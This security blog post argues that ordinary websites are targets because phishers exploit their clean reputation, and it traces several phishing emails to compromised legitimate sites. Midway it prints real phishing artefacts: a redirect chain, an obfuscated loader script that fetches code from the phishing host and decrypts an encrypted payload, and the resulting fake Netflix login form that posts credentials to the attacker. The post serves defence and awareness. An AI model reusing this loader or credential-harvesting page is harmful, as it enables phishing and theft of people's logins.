The One Valuable Thing All Websites Have: Reputation (and Why It Is So Attractive to Hackers)

The One Valuable Thing All Websites Have: Reputation (and Why It Is So Attractive to Hackers)

Here’s something I hear quite a bit when talking about security things:

Our site isn’t a target, it doesn’t have anything valuable on it

This is usually the retort that comes back in defence of some pretty shady practices and in the mind of the defendant, it’s a perfectly reasonable position. They don’t collect any credentials, they don’t have any payment info and in many cases, the site is simply a static representation of content that rarely changes. So what upside is there for an attacker?

Reputation. More specifically, a non-negative reputation because that’s a valuable thing to attackers wanting to mount a phishing campaign. This happens on an alarmingly regular basis and there was a perfect illustration of precisely this when it was discovered that spammers were hosting files on Equifax’s website (every time we thought it couldn’t get any worse…). This subheading within the piece describes precisely what the attraction is:

Spammers Crave Legitimate Domains

I’ll come back to illustrating the value proposition of this a little later on but for now, I want to share a collection of examples I’ve been saving over the last few months. What follows are all phishing emails which made their way through Microsoft’s Outlook.com filters and landed in my inbox. For example, this one suggesting that I needed to upgrade my account:

Microsoft Phish 1

Looks legit, nice work on the “Microsof” spelling too guys! Ok, it actually looks terrible but the phishing page it then links to is pretty convincing:

All Things Mechanical (Phish)

Here’s the real point of this post though: note the domain in the image above now look at the actual legitimate website it sits within:

All Things Mechanical

It’s a normal, garden variety website. Pretty rudimentary, running on WordPress and very possibly using any number of plugins which have had serious security risks in the past. It’s the sort of site people think doesn’t pose any upside to an attacker, yet here we are.

Another phish for Microsoft credentials which again, made it directly into my inbox was this one:

Microsoft Phish 2

It displays many of the hallmarks of a phishing attack including establishing a sense of urgency, providing a call to action and attempting to create an air of authenticity. The text “This message is from a trusted sender” you see in the header is the name of the recipient and that same text in the body of the email is nothing more than stylised HTML.

It links through to a similarly convincing phishing page:

Daffodil Excursion Phish

This page happily loaded through my ISP and through Chrome’s anti-phishing protection because the site was yet to be flagged as malicious. Once I stripped off the path, here’s what was on the site:

Daffodil Excursion

Nobody ever suspects daffodils! Chrome certainly didn’t but if you try going to that site now, you’ll have a very different experience. Now I doubt the Daffodil Excursion website ever had much going on for it traffic wise, but it’s value proposition was that it didn’t have a negative reputation!

Another Microsoft phish came through which looked particularly convincing:

Outlook Pfish

And once again, served up a pretty slick looking phishing page:

Bryansford Phish

Which, per the theme of this post, is actually a perfectly legitimate website for a club in Northern Ireland:

Bryansford

For a change of pace from Microsoft phishes, a Netflix one came through:

Netflix Phish

This eventually bounced me over to this page:

Netflix Phishing Site

You’ll see this is on the domain awpaugp250.siterubix.com which is now disabled and would originally have been provisioned as a site built on the SiteRubix service. That’s not the interesting bit here, it’s that the original email click went through to customers.easy.net.gr/xad/:

Easy-net-site

Which did a 302 to 2no.co/3YR3B3 which then did a 301 to awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/ which then did a 302 to the 1931f0840cfa5b56436809863fc47c2d path which did a 301 to awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/which was the final destination. It bounced through multiple legitimate hosts before arriving at the destination. But that was just the beginning…

That final page then contained the following script which uses this implementation of AES in JavaScriptto decrypt an encrypted payload:

<html><head><script src=http://awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/hok.js></script><script>
var hea2p =
(0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz);
var hea2t =
‘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’;
var output = Aes.Ctr.decrypt(hea2t, hea2p, 256);
document.write(output)</script>

Once decrypted, it’s written out to the page like this:

<title>Netflix</title>
<meta content= name=keywords>
<meta content= name=description>
<meta http-equiv=Content-Type content=text/html; charset=UTF-8>
<meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content=IE=edge>
<meta name=viewport content=width=device-width,initial-scale=1.0>
<link type=text/css rel=stylesheet href=css/z.css>
<link type=text/css rel=stylesheet href=css/a.css>
<link rel=shortcut icon href=img/nficon2015.ico>
</head>
<body>
<div id=appMountPoint>
<div class=login-wrapper data-reactid=.n04xqojxfk data-react-checksum=-290266296>
<div class=nfHeader login-header signupBasicHeader data-reactid=.n04xqojxfk.0>
<a href=# class=icon-logoUpdate nfLogo signupBasicHeader data-reactid=.n04xqojxfk.0.1>
<span class=screen-reader-text data-reactid=.n04xqojxfk.0.1.0>Netflix</span></a>
</div>
<div class=login-body data-reactid=.2app2tcssn4.1>
<div class=login-content login-form data-reactid=.2app2tcssn4.1.0>
<h1 data-reactid=.2app2tcssn4.1.0.0>Sign In</h1>
<form class=login-form action=r1.php method=post>
<label class=login-input login-input-email ui-label ui-input-label>
<span class=ui-label-text>Email</span>
<input class=ui-text-input name=email type=email required= value= tabindex=0></label>
<label class=login-input login-input-password ui-label ui-input-label>
<span class=ui-label-text>Password</span>
<input class=ui-text-input name=password type=password required= tabindex=0></label>
<div class=login-forgot-password-wrapper><a href=# tabindex=3 =>Forgot your email or password?</a>
</div>
<div class=login-remember-me-wrapper>
<div class=login-remember-me><label class=login-label-remember-me>
<input type=checkbox class=login-input-remember-me value=true checked= name=rememberMeCheckbox>
<span>Remember me on this device.</span>
</label>
</div>
</div>
<button class=btn login-button btn-submit btn-small type=submit autocomplete=off tabindex=0>
<spa>Sign In</spa></button>
</form>
<div class=facebookForm regOption>
<button class=btn disabled cta-fb-gdp btn-submit btn-small type=submit disabled= autocomplete=off tabindex=0>
<span class=icon-facebook></span>
<span class=fbBtnText>Login with Facebook</span>
</button>
</div>
<div class=login-signup-now>
<br>
<span>New to Netflix? </span>
<a class= target=_self href=#>Sign up now</a>
<span>.</span>
</div>
</div>
</div>
<div class=site-footer-wrapper login-footer>
<div class=footer-divider>
</div>
<div class=site-footer>
<p class=footer-top>
<a class=footer-top-a href=#>Questions? Contact us.</a></p>
<ul class=footer-links structural>
<li class=footer-link-item>
<a class=footer-link href=#>
<span>Gift Card Terms</span></a>
</li>
<li class=footer-link-item>
<a class=footer-link href=#>
<span>Terms of Use</span>
</a>
</li>
<li class=footer-link-item>
<a class=footer-link href=#>
<span>Privacy Statement</span></a>
</li>
</ul>
<div class=lang-selection-container id=lang-switcher>
<div class=ui-select-wrapper>
<div class=select-arrow medium prefix globe>
<select class=ui-select medium tabindex=0>
<option value=#>English</option>
</select>
</div>
</div>
</div>
<p class=copy-text <= p=>
</p></div>
</div>
</div>
</div>
</body></html>
</pre>

And there’s your phishing page which all began with that one little hop through a compromised site.

Now compare the experience in the images above – namely the fact that I could load the sites without warning – to the following experiences. For example, if I attempt to load the aforementioned daffodil site in Chrome today:

Chrome-Phishing-Protection

This is simply a matter of sufficient time having passed that Google has now classified the site as malicious and placed a rather unmissable warning on it.

Here’s what happens if I try and hit a site that Freedome VPN recognises as malicious:

Freedome Phishing Protection

Turn the VPN off and that same site is flagged my ISP:

Telstra Phishing Protection

Then there’s Microsoft’s safe links implementation which intervenes when accessing a malicious URL sent by email:

Outlook-Phishing-Protection

So, you see the pattern: domains with non-negative reputations are valuable – that’s the attraction here and it’s just as attractive whether a site is collecting valuable user credentials or posting photos of daffodils! Every site has something valuable they need to protect and that’s their reputation. Let that go, and the only thing you’re left with is those last 4 screen shots above.

News/content article courtesy of Troy Hunt »

It's only fair to share...Share on Facebook1Share on Google+0Tweet about this on TwitterShare on LinkedIn1Share on Tumblr0Digg thisPin on Pinterest0Email this to someoneShare on Yummly0Share on VKShare on StumbleUpon0Flattr the authorShare on Reddit0Buffer this page